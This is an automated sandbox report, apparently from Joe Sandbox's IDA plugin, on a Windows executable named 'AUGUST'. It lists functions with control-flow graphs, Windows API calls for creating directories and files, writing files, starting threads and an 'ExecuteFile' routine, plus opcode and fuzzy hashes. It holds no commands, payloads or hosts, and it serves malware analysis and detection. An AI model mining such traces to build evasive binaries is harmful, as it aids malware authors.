                            • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                          • String ID:
                          • API String ID: 359084233-0
                          • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                          • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                          • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                          • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1300 401986-401995 CreateDirectoryW 1301 4019c7-4019cb 1300->1301 1302 401997-4019a4 GetLastError 1300->1302 1303 4019b1-4019be GetFileAttributesW 1302->1303 1304 4019a6 1302->1304 1303->1301 1306 4019c0-4019c2 1303->1306 1305 4019a7-4019b0 SetLastError 1304->1305 1306->1301 1307 4019c4-4019c5 1306->1307 1307->1305
                          APIs
                          • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                          • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                          • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ErrorLast$AttributesCreateDirectoryFile
                          • String ID:
                          • API String ID: 635176117-0
                          • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                          • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                          • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                          • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1308 404a44-404a62 call 408676 ??2@YAPAXI@Z 1311 404a64-404a6b call 40a9f8 1308->1311 1312 404a6d 1308->1312 1314 404a6f-404a91 call 408726 call 40dcfb 1311->1314 1312->1314 1341 404a92 call 40b2fc 1314->1341 1342 404a92 call 40a7de 1314->1342 1319 404a95-404a97 1320 404ab3-404abd 1319->1320 1321 404a99-404aa9 call 407776 1319->1321 1323 404ada-404ae4 ??2@YAPAXI@Z 1320->1323 1324 404abf-404ac1 call 403354 1320->1324 1337 404aae-404ab2 1321->1337 1325 404ae6-404aed call 404292 1323->1325 1326 404aef 1323->1326 1331 404ac6-404ac9 1324->1331 1330 404af1-404af6 call 40150b 1325->1330 1326->1330 1336 404afb-404afd 1330->1336 1331->1323 1335 404acb 1331->1335 1338 404ad0-404ad8 1335->1338 1336->1338 1338->1337 1341->1319 1342->1319
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000010,?,00405D20,?,00417788,00417788), ref: 00404A5A
                          • ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??2@
                          • String ID: ExecuteFile
                          • API String ID: 1033339047-323923146
                          • Opcode ID: fa0511c003ccdb3ab72568a6a3a656966613ea7ca94b66f833361549b4052979
                          • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                          • Opcode Fuzzy Hash: fa0511c003ccdb3ab72568a6a3a656966613ea7ca94b66f833361549b4052979
                          • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1343 40adc3-40adce 1344 40add0-40add3 1343->1344 1345 40ae0d-40ae0f 1343->1345 1346 40add5-40ade3 ??2@YAPAXI@Z 1344->1346 1347 40adfb 1344->1347 1348 40adfd-40ae0c ??3@YAXPAX@Z 1346->1348 1349 40ade5-40ade7 1346->1349 1347->1348 1348->1345 1350 40ade9 1349->1350 1351 40adeb-40adf9 memmove 1349->1351 1350->1351 1351->1348
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                          • memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??2@??3@memmove
                          • String ID:
                          • API String ID: 3828600508-0
                          • Opcode ID: 681e1b0d226f40fe4ab8b8450f07d9ff2e75d0d2427af455dbd11f2bdce48d51
                          • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                          • Opcode Fuzzy Hash: 681e1b0d226f40fe4ab8b8450f07d9ff2e75d0d2427af455dbd11f2bdce48d51
                          • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                          APIs
                          • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: GlobalMemoryStatus
                          • String ID: @
                          • API String ID: 1890195054-2766056989
                          • Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                          • Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
                          • Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                          • Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
                          APIs
                            • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                            • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                            • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                            • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@$??2@ExceptionThrowmemmove
                          • String ID:
                          • API String ID: 4269121280-0
                          • Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                          • Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
                          • Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                          • Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@H_prolog
                          • String ID:
                          • API String ID: 1329742358-0
                          • Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                          • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                          • Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                          • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??2@??3@
                          • String ID:
                          • API String ID: 1936579350-0
                          • Opcode ID: 453a3e3f1ff100c9dcfb77a92201942aa697f3f866fb972755d4e05e551f17b9
                          • Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
                          • Opcode Fuzzy Hash: 453a3e3f1ff100c9dcfb77a92201942aa697f3f866fb972755d4e05e551f17b9
                          • Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022C0
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022E4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??2@??3@
                          • String ID:
                          • API String ID: 1936579350-0
                          • Opcode ID: 161b1d3c566106e9ad65e75d5d4507556b29aa609190ea75727e2c569a68f83b
                          • Instruction ID: 09ebe67ff45b08f81c36141d9c2dc2e417a159b47c448e0a3757dda97e47d19e
                          • Opcode Fuzzy Hash: 161b1d3c566106e9ad65e75d5d4507556b29aa609190ea75727e2c569a68f83b
                          • Instruction Fuzzy Hash: 8CF030351046529FC330DF69C584853F7E4EB59715721887FE1D6D36A2C674A880CB64
                          APIs
                          • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                          • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ErrorFileLastPointer
                          • String ID:
                          • API String ID: 2976181284-0
                          • Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                          • Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
                          • Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                          • Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 0040ED05
                          • _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: AllocExceptionStringThrow
                          • String ID:
                          • API String ID: 3773818493-0
                          • Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                          • Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
                          • Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                          • Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9
                          APIs
                          • EnterCriticalSection.KERNEL32(?), ref: 0040E745
                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave
                          • String ID:
                          • API String ID: 3168844106-0
                          • Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                          • Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
                          • Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                          • Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                          • Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
                          • Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                          • Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A
                          APIs
                          • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                          • Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
                          • Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                          • Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59
                          APIs
                            • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                          • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: CloseCreateFileHandle
                          • String ID:
                          • API String ID: 3498533004-0
                          • Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                          • Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
                          • Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                          • Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94
                          APIs
                          • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                          • Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
                          • Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                          • Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54
                          APIs
                          • _beginthreadex.MSVCRT ref: 00406552
                            • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ErrorLast_beginthreadex
                          • String ID:
                          • API String ID: 4034172046-0
                          • Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                          • Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
                          • Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                          • Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
